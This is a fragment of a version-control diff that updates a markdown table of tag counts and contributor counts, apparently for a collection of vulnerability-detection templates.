+| cve2015 | 20 | harshbothra_ | 7 | | | | | | | +| disclosure | 20 | oppsec | 7 | | | | | | | +| cisco | 19 | meme-lord | 6 | | | | | | | +| generic | 19 | logicalhunter | 6 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| router | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| auth-bypass | 17 | ganofins | 5 | | | | | | | +| springboot | 16 | elsfa7110 | 5 | | | | | | | +| debug | 15 | yanyun | 5 | | | | | | | +| cve2014 | 15 | joanbono | 5 | | | | | | | +| misconfig | 14 | panch0r3d | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| cve2011 | 13 | pentest_swissky | 5 | | | | | | | +| struts | 13 | iamnoooob | 5 | | | | | | | +| php | 13 | xelkomy | 4 | | | | | | | +| adobe | 13 | e_schultze_ | 4 | | | | | | | | fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| adobe | 12 | e_schultze_ | 4 | | | | | | | -| weblogic | 12 | xelkomy | 4 | | | | | | | -| jenkins | 12 | tess | 3 | | | | | | | -| dns | 12 | dudez | 3 | | | | | | | -| php | 12 | emenalf | 3 | | | | | | | -| dlink | 12 | thomas_from_offensity | 3 | | | | | | | -| zoho | 11 | impramodsargar | 3 | | | | | | | -| cve2013 | 11 | vsh00t | 3 | | | | | | | -| devops | 11 | shine | 3 | | | | | | | -| ftp | 9 | lu4nx | 3 | | | | | | | -| magento | 9 | shifacyclewala | 3 | | | | | | | -| xxe | 9 | jarijaas | 3 | | | | | | | -| aws | 9 | yash anand @yashanand155 | 3 | | | | | | | -| login | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| gitlab | 8 | fyoorer | 3 | | | | | | | -| rails | 8 | incogbyte | 3 | | | | | | | -| scada | 8 | mavericknerd | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| cnvd | 8 | z3bd | 3 | | | | | | | -| cms | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | gal nagli | 2 | | | | | | | -| backup | 7 | random-robbie | 2 | | | | | | | -| vmware | 7 | dheerajmadhukar | 2 | | | | | | | -| cve2009 | 7 | pxmme1337 | 2 | | | | | | | -| citrix | 6 | hahwul | 2 | | | | | | | -| coldfusion | 6 | arcc | 2 | | | | | | | -| docker | 6 | fabaff | 2 | | | | | | | -| laravel | 6 | whoever | 2 | | | | | | | -| jetty | 6 | alifathi-h1 | 2 | | | | | | | -| api | 6 | ehsahil | 2 | | | | | | | -| google | 6 | parth | 2 | | | | | | | -| solr | 6 | ree4pwn | 2 | | | | | | | -| dell | 6 | moritz nentwig | 2 | | | | | | | -| rconfig | 6 | hetroublemakr | 2 | | | | | | | -| django | 6 | 0xrudra | 2 | | | | | | | -| files | 6 | 0xelkomy | 2 | | | | | | | -| cve2008 | 6 | vavkamil | 2 | | | | | | | -| netgear | 6 | w4cky_ | 2 | | | | | | | -| drupal | 5 | zomsop82 | 2 | | | | | | | -| printer | 5 | 0xprial | 2 | | | | | | | -| headless | 5 | bing0o | 2 | | | | | | | -| phpmyadmin | 5 | cocxanh | 2 | | | | | | | -| confluence | 5 | afaq | 2 | | | | | | | -| wp-theme | 5 | randomrobbie | 2 | | | | | | | -| windows | 5 | manas_harsh | 2 | | | | | | | -| circarlife | 5 | 0xcrypto | 2 | | | | | | | -| fileupload | 5 | nkxxkn | 2 | | | | | | | -| ssti | 5 | 0xsapra | 2 | | | | | | | -| microsoft | 5 | x1m_martijn | 2 | | | | | | | -| ibm | 5 | bp0lr | 2 | | | | | | | -| lucee | 5 | lotusdll | 2 | | | | | | | -| iis | 5 | gevakun | 2 | | | | | | | -| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| dedecms | 5 | joeldeleep | 2 | | | | | | | -| jolokia | 4 | koti2 | 2 | | | | | | | -| tomcat | 4 | swissky | 2 | | | | | | | -| hp | 4 | sushantkamble | 2 | | | | | | | -| glpi | 4 | davidmckennirey | 2 | | | | | | | -| deserialization | 4 | foulenzer | 2 | | | | | | | -| crlf | 4 | mohammedsaneem | 2 | | | | | | | -| thinkphp | 4 | amsda | 2 | | | | | | | -| zimbra | 4 | bsysop | 2 | | | | | | | -| samsung | 4 | unstabl3 | 2 | | | | | | | -| wso2 | 4 | kiblyn11 | 2 | | | | | | | -| webserver | 4 | udit_thakkur | 2 | | | | | | | -| hongdian | 4 | yashanand155 | 1 | | | | | | | -| moodle | 4 | andirrahmani1 | 1 | | | | | | | -| grafana | 4 | j33n1k4 | 1 | | | | | | | -| elastic | 4 | johnjhacking | 1 | | | | | | | -| firmware | 4 | omarkurt | 1 | | | | | | | -| thinkcmf | 4 | blckraven | 1 | | | | | | | -| symfony | 4 | bad5ect0r | 1 | | | | | | | -| nodejs | 4 | streetofhackerr007 | 1 | | | | | | | -| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| android | 13 | nodauf | 4 | | | | | | | +| weblogic | 12 | thomas_from_offensity | 3 | | | | | | | +| devops | 12 | impramodsargar | 3 | | | | | | | +| dlink | 12 | emenalf | 3 | | | | | | | +| dns | 12 | incogbyte | 3 | | | | | | | +| jenkins | 12 | 0w4ys | 3 | | | | | | | +| cve2013 | 11 | mavericknerd | 3 | | | | | | | +| zoho | 11 | shine | 3 | | | | | | | +| magento | 9 | f1tz | 3 | | | | | | | +| xxe | 9 | binaryfigments | 3 | | | | | | | +| ftp | 9 | fyoorer | 3 | | | | | | | +| aws | 9 | vsh00t | 3 | | | | | | | +| ruijie | 8 | lu4nx | 3 | | | | | | | +| scada | 8 | z3bd | 3 | | | | | | | +| login | 8 | dudez | 3 | | | | | | | +| cnvd | 8 | jarijaas | 3 | | | | | | | +| gitlab | 8 | shifacyclewala | 3 | | | | | | | +| airflow | 8 | tess | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| cms | 7 | yash anand @yashanand155 | 3 | | | | | | | +| kubernetes | 7 | hahwul | 2 | | | | | | | +| nginx | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| netgear | 7 | swissky | 2 | | | | | | | +| cve2009 | 7 | 0xprial | 2 | | | | | | | +| files | 7 | w4cky_ | 2 | | | | | | | +| backup | 7 | 0xcrypto | 2 | | | | | | | +| coldfusion | 7 | 0xrudra | 2 | | | | | | | +| vmware | 7 | cocxanh | 2 | | | | | | | +| google | 6 | gal nagli | 2 | | | | | | | +| api | 6 | lotusdll | 2 | | | | | | | +| solr | 6 | koti2 | 2 | | | | | | | +| cve2008 | 6 | fabaff | 2 | | | | | | | +| django | 6 | pxmme1337 | 2 | | | | | | | +| dell | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | random-robbie | 2 | | | | | | | +| jetty | 6 | unstabl3 | 2 | | | | | | | +| docker | 6 | ree4pwn | 2 | | | | | | | +| laravel | 6 | johnjhacking | 2 | | | | | | | +| citrix | 6 | dheerajmadhukar | 2 | | | | | | | +| confluence | 6 | 0xsapra | 2 | | | | | | | +| windows | 5 | afaq | 2 | | | | | | | +| circarlife | 5 | foulenzer | 2 | | | | | | | +| drupal | 5 | 0xelkomy | 2 | | | | | | | +| headless | 5 | bp0lr | 2 | | | | | | | +| lucee | 5 | moritz nentwig | 2 | | | | | | | +| microsoft | 5 | arcc | 2 | | | | | | | +| fileupload | 5 | bsysop | 2 | | | | | | | +| java | 5 | hetroublemakr | 2 | | | | | | | +| nodejs | 5 | randomrobbie | 2 | | | | | | | +| ssti | 5 | huowuzhao | 2 | | | | | | | +| printer | 5 | nkxxkn | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| iis | 5 | socketz | 2 | | | | | | | +| wp-theme | 5 | davidmckennirey | 2 | | | | | | | +| dedecms | 5 | gevakun | 2 | | | | | | | +| ibm | 5 | joeldeleep | 2 | | | | | | | +| hongdian | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | mohammedsaneem | 2 | | | | | | | +| crlf | 4 | amsda | 2 | | | | | | | +| samsung | 4 | ehsahil | 2 | | | | | | | +| wso2 | 4 | whoever | 2 | | | | | | | +| solarwinds | 4 | bing0o | 2 | | | | | | | +| vpn | 4 | vavkamil | 2 | | | | | | | +| traversal | 4 | sushantkamble | 2 | | | | | | | +| artifactory | 4 | r3naissance | 2 | | | | | | | +| deserialization | 4 | convisoappsec | 2 | | | | | | | +| tomcat | 4 | g4l1t0 | 2 | | | | | | | +| firmware | 4 | x1m_martijn | 2 | | | | | | | +| zimbra | 4 | alifathi-h1 | 2 | | | | | | | +| thinkphp | 4 | manas_harsh | 2 | | | | | | | +| jolokia | 4 | parth | 2 | | | | | | | +| glpi | 4 | kurohost | 1 | | | | | | | +| grafana | 4 | ldionmarcil | 1 | | | | | | | +| elastic | 4 | notsoevilweasel | 1 | | | | | | | +| exchange | 4 | luskabol | 1 | | | | | | | +| asp | 4 | c3l3si4n | 1 | | | | | | | +| buffalo | 4 | zandros0 | 1 | | | | | | | +| thinkcmf | 4 | udyz | 1 | | | | | | | +| hp | 4 | sickwell | 1 | | | | | | | +| symfony | 4 | b4uh0lz | 1 | | | | | | | +| webserver | 4 | akshansh | 1 | | | | | | | +| moodle | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| zhiyuan | 3 | deena | 1 | | | | | | | +| ebs | 3 | revblock | 1 | | | | | | | +| fpd | 3 | hanlaomo | 1 | | | | | | | +| lfr | 3 | mah3sec_ | 1 | | | | | | | +| resin | 3 | akash.c | 1 | | | | | | | +| caucho | 3 | defr0ggy | 1 | | | | | | | +| mongodb | 3 | elder tao | 1 | | | | | | | +| ofbiz | 3 | divya_mudgal | 1 | | | | | | | +| openssh | 3 | x6263 | 1 | | | | | | | +| fanruan | 3 | _c0wb0y_ | 1 | | | | | | | +| opensis | 3 | me9187 | 1 | | | | | | | +| git | 3 | @dwisiswant0 | 1 | | | | | | | +| amazon | 3 | ohlinge | 1 | | | | | | | +| oa | 3 | regala_ | 1 | | | | | | | +| terramaster | 3 | mass0ma | 1 | | | | | | | +| nacos | 3 | evolutionsec | 1 | | | | | | | +| nosqli | 3 | johnk3r | 1 | | | | | | | +| targa | 3 | co0nan | 1 | | | | | | | +| vbulletin | 3 | daviey | 1 | | | | | | | +| intrusive | 3 | berkdusunur | 1 | | | | | | | +| zabbix | 3 | 0xtavian | 1 | | | | | | | +| slack | 3 | th3.d1p4k | 1 | | | | | | | +| r-seenet | 3 | shifacyclewla | 1 | | | | | | | +| microstrategy | 3 | bjhulst | 1 | | | | | | | +| ssh | 3 | omarkurt | 1 | | | | | | | +| httpd | 3 | fmunozs | 1 | | | | | | | +| itop | 3 | mesaglio | 1 | | | | | | | +| log | 3 | sicksec | 1 | | | | | | | +| kevinlab | 3 | kabirsuda | 1 | | | | | | | +| kafka | 3 | iampritam | 1 | | | | | | | +| bitrix | 3 | _harleo | 1 | | | | | | | +| backups | 3 | ipanda | 1 | | | | | | | +| springcloud | 3 | sy3omda | 1 | | | | | | | +| nexus | 3 | aceseven (digisec360) | 1 | | | | | | | +| tikiwiki | 3 | bernardofsr | 1 | | | | | | | +| bypass | 3 | toufik airane | 1 | | | | | | | +| couchdb | 2 | yashanand155 | 1 | | | | | | | +| cve2005 | 2 | mubassirpatel | 1 | | | | | | | +| flir | 2 | streetofhackerr007 | 1 | | | | | | | +| natshell | 2 | ilovebinbash | 1 | | | | | | | +| mida | 2 | skeltavik | 1 | | | | | | | +| nagios | 2 | un-fmunozs | 1 | | | | | | | +| npm | 2 | 0ut0fb4nd | 1 | | | | | | | +| splunk | 2 | its0x08 | 1 | | | | | | | +| guacamole | 2 | zhenwarx | 1 | | | | | | | +| yapi | 2 | exploitation | 1 | | | | | | | +| maian | 2 | rtcms | 1 | | | | | | | +| waf | 2 | smaranchand | 1 | | | | | | | +| sonicwall | 2 | alperenkesk | 1 | | | | | | | +| cve2007 | 2 | thevillagehacker | 1 | | | | | | | +| jeedom | 2 | aresx | 1 | | | | | | | +| geowebserver | 2 | luci | 1 | | | | | | | +| status | 2 | adrianmf | 1 | | | | | | | +| plesk | 2 | knassar702 | 1 | | | | | | | +| prometheus | 2 | kre80r | 1 | | | | | | | +| globalprotect | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| seeyon | 2 | andysvints | 1 | | | | | | | +| keycloak | 2 | d0rkerdevil | 1 | | | | | | | +| frp | 2 | noamrathaus | 1 | | | | | | | +| telerik | 2 | pudsec | 1 | | | | | | | +| github | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| akkadian | 2 | 52971 | 1 | | | | | | | +| smb | 2 | yashgoti | 1 | | | | | | | +| prestashop | 2 | blckraven | 1 | | | | | | | +| chiyu | 2 | jteles | 1 | | | | | | | +| leak | 2 | nytr0gen | 1 | | | | | | | +| avantfax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| dolibarr | 2 | alph4byt3 | 1 | | | | | | | +| openfire | 2 | undefl0w | 1 | | | | | | | +| spark | 2 | vzamanillo | 1 | | | | | | | +| oauth | 2 | idealphase | 1 | | | | | | | +| ec2 | 2 | shelld3v | 1 | | | | | | | +| jboss | 2 | pratik khalane | 1 | | | | | | | +| rockethchat | 2 | sshell | 1 | | | | | | | +| node | 2 | cookiehanhoan | 1 | | | | | | | +| wordfence | 2 | kba@sogeti_esec | 1 | | | | | | | +| openam | 2 | retr0 | 1 | | | | | | | +| icewarp | 2 | _darrenmartyn | 1 | | | | | | | +| sharepoint | 2 | apt-mirror | 1 | | | | | | | +| mail | 2 | abison_binoy | 1 | | | | | | | +| axis2 | 2 | remonsec | 1 | | | | | | | +| proxy | 2 | 0xteles | 1 | | | | | | | +| grav | 2 | hakluke | 1 | | | | | | | +| rockmongo | 2 | alex | 1 | | | | | | | +| firebase | 2 | affix | 1 | | | | | | | +| saltstack | 2 | infosecsanyam | 1 | | | | | | | +| service | 2 | juicypotato1 | 1 | | | | | | | +| jellyfin | 2 | dawid-czarnecki | 1 | | | | | | | +| trixbox | 2 | @github.com/defr0ggy | 1 | | | | | | | +| odoo | 2 | 0xrod | 1 | | | | | | | +| azure | 2 | willd96 | 1 | | | | | | | +| pega | 2 | bad5ect0r | 1 | | | | | | | +| bigip | 2 | intx0x80 | 1 | | | | | | | +| injection | 2 | ajaysenr | 1 | | | | | | | +| dos | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| jsf | 2 | b0rn2r00t | 1 | | | | | | | +| middleware | 2 | rodnt | 1 | | | | | | | +| mcafee | 2 | sullo | 1 | | | | | | | +| ecology | 2 | naglinagli | 1 | | | | | | | +| glassfish | 2 | manuelbua | 1 | | | | | | | +| hpe | 2 | pdp | 1 | | | | | | | +| netis | 2 | patralos | 1 | | | | | | | +| rstudio | 2 | petruknisme | 1 | | | | | | | +| igs | 2 | chron0x | 1 | | | | | | | +| linkerd | 2 | flag007 | 1 | | | | | | | +| hoteldruid | 2 | mhdsamx | 1 | | | | | | | +| nextjs | 2 | ratnadip gajbhiye | 1 | | | | | | | +| axis | 2 | rojanrijal | 1 | | | | | | | +| voipmonitor | 2 | ahmed sherif | 1 | | | | | | | +| kibana | 2 | philippdelteil | 1 | | | | | | | +| phpcollab | 2 | micha3lb3n | 1 | | | | | | | +| backdoor | 2 | wabafet | 1 | | | | | | | +| paloalto | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| traversal | 4 | retr0 | 1 | | | | | | | -| exchange | 4 | regala_ | 1 | | | | | | | -| solarwinds | 4 | intx0x80 | 1 | | | | | | | -| vpn | 4 | luci | 1 | | | | | | | -| magmi | 4 | juicypotato1 | 1 | | | | | | | -| asp | 4 | mah3sec_ | 1 | | | | | | | -| buffalo | 4 | convisoappsec | 1 | | | | | | | -| oa | 3 | deena | 1 | | | | | | | -| terramaster | 3 | aresx | 1 | | | | | | | -| bitrix | 3 | kurohost | 1 | | | | | | | -| nexus | 3 | undefl0w | 1 | | | | | | | -| fanruan | 3 | mhdsamx | 1 | | | | | | | -| zabbix | 3 | schniggie | 1 | | | | | | | -| slack | 3 | shelld3v | 1 | | | | | | | -| itop | 3 | bjhulst | 1 | | | | | | | -| kafka | 3 | raesene | 1 | | | | | | | -| vbulletin | 3 | abison_binoy | 1 | | | | | | | -| bypass | 3 | apt-mirror | 1 | | | | | | | -| mongodb | 3 | zhenwarx | 1 | | | | | | | -| lfr | 3 | cookiehanhoan | 1 | | | | | | | -| targa | 3 | hakluke | 1 | | | | | | | -| caucho | 3 | petruknisme | 1 | | | | | | | -| ssh | 3 | berkdusunur | 1 | | | | | | | -| nosqli | 3 | bernardo rodrigues | 1 | | | | | | | +| xxljob | 2 | shreyapohekar | 1 | | | | | | | +| vrealize | 2 | bolli95 | 1 | | | | | | | +| webcam | 2 | absshax | 1 | | | | | | | +| emerge | 2 | tirtha_mandal | 1 | | | | | | | +| hasura | 2 | 0h1in9e | 1 | | | | | | | +| shellshock | 2 | gboddin | 1 | | | | | | | +| strapi | 2 | yavolo | 1 | | | | | | | +| idrac | 2 | fopina | 1 | | | | | | | +| showdoc | 2 | makyotox | 1 | | | | | | | +| chamilo | 2 | tim_koopmans | 1 | | | | | | | +| horde | 2 | thezakman | 1 | | | | | | | +| hjtcloud | 2 | ringo | 1 | | | | | | | +| ucmdb | 2 | sec_hawk | 1 | | | | | | | +| akamai | 2 | furkansenan | 1 | | | | | | | +| kentico | 2 | qlkwej | 1 | | | | | | | +| smtp | 2 | whynotke | 1 | | | | | | | +| hashicorp | 2 | geraldino2 | 1 | | | | | | | +| activemq | 2 | taielab | 1 | | | | | | | +| huawei | 2 | jeya seelan | 1 | | | | | | | +| cache | 2 | soyelmago | 1 | | | | | | | +| sonarqube | 2 | elmahdi | 1 | | | | | | | +| fortios | 2 | s1r1u5_ | 1 | | | | | | | +| etouch | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| bash | 1 | becivells | 1 | | | | | | | +| 74cms | 1 | izn0u | 1 | | | | | | | +| smartblog | 1 | j33n1k4 | 1 | | | | | | | +| cloudflare | 1 | b0yd | 1 | | | | | | | +| api-manager | 1 | ooooooo_q | 1 | | | | | | | +| clink-office | 1 | raesene | 1 | | | | | | | +| codeigniter | 1 | kareemse1im | 1 | | | | | | | +| solarlog | 1 | borna nematzadeh | 1 | | | | | | | +| interlib | 1 | andirrahmani1 | 1 | | | | | | | +| primetek | 1 | schniggie | 1 | | | | | | | +| nexusdb | 1 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| ebs | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| backups | 3 | yavolo | 1 | | | | | | | -| resin | 3 | andysvints | 1 | | | | | | | -| zhiyuan | 3 | kba@sogeti_esec | 1 | | | | | | | -| ofbiz | 3 | bolli95 | 1 | | | | | | | -| openssh | 3 | sy3omda | 1 | | | | | | | -| httpd | 3 | manuelbua | 1 | | | | | | | -| microstrategy | 3 | noamrathaus | 1 | | | | | | | -| kubernetes | 3 | rojanrijal | 1 | | | | | | | -| kevinlab | 3 | rodnt | 1 | | | | | | | -| nacos | 3 | ahmed sherif | 1 | | | | | | | -| tikiwiki | 3 | remonsec | 1 | | | | | | | -| springcloud | 3 | 0xtavian | 1 | | | | | | | -| fpd | 3 | tirtha_mandal | 1 | | | | | | | -| intrusive | 3 | iampritam | 1 | | | | | | | -| log | 3 | notsoevilweasel | 1 | | | | | | | -| opensis | 3 | s1r1u5_ | 1 | | | | | | | -| amazon | 3 | akash.c | 1 | | | | | | | -| r-seenet | 3 | d0rkerdevil | 1 | | | | | | | -| git | 3 | fopina | 1 | | | | | | | -| smb | 2 | rtcms | 1 | | | | | | | -| grav | 2 | c3l3si4n | 1 | | | | | | | -| paloalto | 2 | kre80r | 1 | | | | | | | -| icewarp | 2 | ldionmarcil | 1 | | | | | | | -| hashicorp | 2 | @github.com/defr0ggy | 1 | | | | | | | -| geowebserver | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| phpcollab | 2 | its0x08 | 1 | | | | | | | -| service | 2 | affix | 1 | | | | | | | -| leak | 2 | toufik airane | 1 | | | | | | | -| prestashop | 2 | exploitation | 1 | | | | | | | -| smtp | 2 | alex | 1 | | | | | | | -| akamai | 2 | b0yd | 1 | | | | | | | -| keycloak | 2 | fmunozs | 1 | | | | | | | -| saltstack | 2 | jeya seelan | 1 | | | | | | | -| status | 2 | b4uh0lz | 1 | | | | | | | -| odoo | 2 | r3naissance | 1 | | | | | | | -| cve2007 | 2 | g4l1t0 | 1 | | | | | | | -| openfire | 2 | infosecsanyam | 1 | | | | | | | -| jboss | 2 | 0ut0fb4nd | 1 | | | | | | | -| nagios | 2 | furkansenan | 1 | | | | | | | -| fortios | 2 | huowuzhao | 1 | | | | | | | -| spark | 2 | thezakman | 1 | | | | | | | -| splunk | 2 | alperenkesk | 1 | | | | | | | -| nextjs | 2 | ipanda | 1 | | | | | | | -| akkadian | 2 | knassar702 | 1 | | | | | | | -| guacamole | 2 | shifacyclewla | 1 | | | | | | | -| sonarqube | 2 | pratik khalane | 1 | | | | | | | -| prometheus | 2 | makyotox | 1 | | | | | | | -| strapi | 2 | alph4byt3 | 1 | | | | | | | -| dos | 2 | yashgoti | 1 | | | | | | | -| chamilo | 2 | elmahdi | 1 | | | | | | | -| cache | 2 | gboddin | 1 | | | | | | | -| webcam | 2 | 0xteles | 1 | | | | | | | -| linkerd | 2 | soyelmago | 1 | | | | | | | -| rockethchat | 2 | willd96 | 1 | | | | | | | -| emerge | 2 | ratnadip gajbhiye | 1 | | | | | | | -| axis2 | 2 | mass0ma | 1 | | | | | | | -| backdoor | 2 | mubassirpatel | 1 | | | | | | | -| activemq | 2 | vzamanillo | 1 | | | | | | | -| flir | 2 | micha3lb3n | 1 | | | | | | | -| waf | 2 | smaranchand | 1 | | | | | | | -| openam | 2 | daviey | 1 | | | | | | | -| azure | 2 | divya_mudgal | 1 | | | | | | | -| glassfish | 2 | sickwell | 1 | | | | | | | -| vrealize | 2 | zandros0 | 1 | | | | | | | -| rstudio | 2 | ooooooo_q | 1 | | | | | | | -| ecology | 2 | chron0x | 1 | | | | | | | -| github | 2 | 0h1in9e | 1 | | | | | | | -| globalprotect | 2 | defr0ggy | 1 | | | | | | | -| yapi | 2 | tim_koopmans | 1 | | | | | | | -| bigip | 2 | _c0wb0y_ | 1 | | | | | | | -| pega | 2 | wabafet | 1 | | | | | | | -| mail | 2 | luskabol | 1 | | | | | | | -| rockmongo | 2 | elder tao | 1 | | | | | | | -| seeyon | 2 | 52971 | 1 | | | | | | | -| firebase | 2 | mesaglio | 1 | | | | | | | -| maian | 2 | @dwisiswant0 | 1 | | | | | | | -| sonicwall | 2 | qlkwej | 1 | | | | | | | -| showdoc | 2 | sshell | 1 | | | | | | | -| horde | 2 | revblock | 1 | | | | | | | -| telerik | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| hoteldruid | 2 | adrianmf | 1 | | | | | | | -| mida | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| jeedom | 2 | patralos | 1 | | | | | | | -| idrac | 2 | kabirsuda | 1 | | | | | | | -| igs | 2 | idealphase | 1 | | | | | | | -| frp | 2 | th3.d1p4k | 1 | | | | | | | -| middleware | 2 | me9187 | 1 | | | | | | | -| ec2 | 2 | sullo | 1 | | | | | | | -| chiyu | 2 | 0xrod | 1 | | | | | | | -| huawei | 2 | co0nan | 1 | | | | | | | -| jsf | 2 | thevillagehacker | 1 | | | | | | | -| wordfence | 2 | shreyapohekar | 1 | | | | | | | -| jellyfin | 2 | dawid czarnecki | 1 | | | | | | | -| avantfax | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| dolibarr | 2 | _darrenmartyn | 1 | | | | | | | -| cve2005 | 2 | evolutionsec | 1 | | | | | | | -| hasura | 2 | absshax | 1 | | | | | | | -| netis | 2 | naglinagli | 1 | | | | | | | -| kentico | 2 | _harleo | 1 | | | | | | | -| oauth | 2 | aceseven (digisec360) | 1 | | | | | | | -| kibana | 2 | bernardofsr | 1 | | | | | | | -| hpe | 2 | ajaysenr | 1 | | | | | | | -| voipmonitor | 2 | akshansh | 1 | | | | | | | -| injection | 2 | nytr0gen | 1 | | | | | | | -| proxy | 2 | un-fmunozs | 1 | | | | | | | -| xxljob | 2 | borna nematzadeh | 1 | | | | | | | -| ucmdb | 2 | sicksec | 1 | | | | | | | -| trixbox | 2 | pudsec | 1 | | | | | | | -| shellshock | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| hjtcloud | 2 | geraldino2 | 1 | | | | | | | -| couchdb | 2 | b0rn2r00t | 1 | | | | | | | -| sharepoint | 2 | ohlinge | 1 | | | | | | | -| mcafee | 2 | johnk3r | 1 | | | | | | | -| natshell | 2 | pdp | 1 | | | | | | | -| axis | 2 | hanlaomo | 1 | | | | | | | -| plesk | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| resourcespace | 1 | becivells | 1 | | | | | | | -| chevereto | 1 | whynotke | 1 | | | | | | | -| addpac | 1 | jteles | 1 | | | | | | | -| gloo | 1 | taielab | 1 | | | | | | | -| acme | 1 | kareemse1im | 1 | | | | | | | -| db | 1 | udyz | 1 | | | | | | | -| announcekit | 1 | sec_hawk | 1 | | | | | | | -| node-red-dashboard | 1 | ilovebinbash | 1 | | | | | | | -| tapestry | 1 | philippdelteil | 1 | | | | | | | -| clockwatch | 1 | ringo | 1 | | | | | | | -| owasp | 1 | flag007 | 1 | | | | | | | -| vnc | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| ilo | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| 